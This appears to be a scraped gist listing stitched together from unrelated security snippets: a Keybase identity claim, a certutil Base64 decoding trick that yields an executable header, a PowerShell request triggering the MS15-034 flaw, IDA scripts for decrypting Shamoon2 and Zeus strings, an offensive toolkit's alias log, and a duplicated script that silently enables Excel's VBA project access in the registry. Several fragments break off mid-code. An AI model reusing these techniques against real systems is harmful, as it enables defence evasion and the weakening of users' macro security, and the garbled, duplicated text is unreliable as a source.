I hereby claim:
- I am kaicastledine on github.
- I am kcsec (https://keybase.io/kcsec) on keybase.
- I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao
To claim this, I am signing this object:
REM Writes a PEM-style wrapper around a Base64 payload into encoded.txt, then has certutil -decode turn it back into raw bytes in decoded.bin.
REM The sample payload TVoAAA== decodes to the four bytes 4D 5A 00 00, i.e. the output begins with the "MZ" magic of a DOS/PE executable.
REM Defender note: certutil.exe run with -decode is a well-known living-off-the-land decoding step (MITRE ATT&CK T1140).
REM Process command-line logging for certutil with -decode, plus file-creation events for its output path, are the usual detection points.
REM NOTE(review): the trailing "|" characters on each line look like table residue from the page extraction, not part of the commands - confirm against the original.
echo -----BEGIN CERTIFICATE----- > encoded.txt | |
REM The next line has no redirection, so it only prints a reminder and adds nothing to encoded.txt.
echo Just Base64 encode your binary data | |
echo TVoAAA== >> encoded.txt | |
echo -----END CERTIFICATE----- >> encoded.txt | |
certutil -decode encoded.txt decoded.bin |
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability | |
function TestMS15_034($hostname, $port) | |
{ | |
if ($port -eq $null) | |
{ | |
$port = 80 | |
} | |
$tc = New-Object Net.Sockets.TcpClient | |
import idc | |
def decrypt_n_comment(func, func_name): | |
""" | |
Decrypt and comment Shamoon2's strings | |
""" | |
data = {} | |
for xref in XrefsTo(LocByName(func_name)): | |
# init |
def decrypt(func): | |
""" | |
Decryption of zeus strings | |
""" | |
ZBOT_INDEX_MIN = 0x0 | |
ZBOT_INDEX_MAX = 0xe7 | |
data = {} | |
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX): | |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
21:25:59>> aliases | |
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1] | |
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%% | |
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%% | |
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
channels : LOCAL : commands %%cmd_args%% | |
channels : ANY_REMOTE : commands %%cmd_args%% | |
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops | |
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops |
I hereby claim:
To claim this, I am signing this object:
<html> | |
<head> | |
<script> | |
// Starts an Excel instance through COM automation and keeps its window hidden.
// ActiveXObject exists only in legacy Microsoft script hosts.
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
// WScript.Shell is used below for its registry-write method.
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
// Per-user Office value behind "Trust access to the VBA project object model", built for the Excel version detected above.
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
// Writing 1 switches that setting on, so automation code may read and modify VBA projects; this weakens the user's macro security posture.
// Defender note: a write to ...\Excel\Security\AccessVBOM made by a script host, rather than by the Trust Center UI or policy, is worth alerting on in registry telemetry.
// The value lives under HKCU, so no elevation is needed to change it; enforcing the setting through administrative policy is the usual mitigation.
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
// NOTE(review): the excerpt ends after the workbook is created; what is done with it is not visible here.
var objWorkbook = objExcel.Workbooks.Add(); | |
<html> | |
<head> | |
<script> | |
// Starts an Excel instance through COM automation and keeps its window hidden.
// ActiveXObject exists only in legacy Microsoft script hosts.
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
// WScript.Shell is used below for its registry-write method.
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
// Per-user Office value behind "Trust access to the VBA project object model", built for the Excel version detected above.
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
// Writing 1 switches that setting on, so automation code may read and modify VBA projects; this weakens the user's macro security posture.
// Defender note: a write to ...\Excel\Security\AccessVBOM made by a script host, rather than by the Trust Center UI or policy, is worth alerting on in registry telemetry.
// The value lives under HKCU, so no elevation is needed to change it; enforcing the setting through administrative policy is the usual mitigation.
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
// NOTE(review): the excerpt ends after the workbook is created; what is done with it is not visible here.
var objWorkbook = objExcel.Workbooks.Add(); | |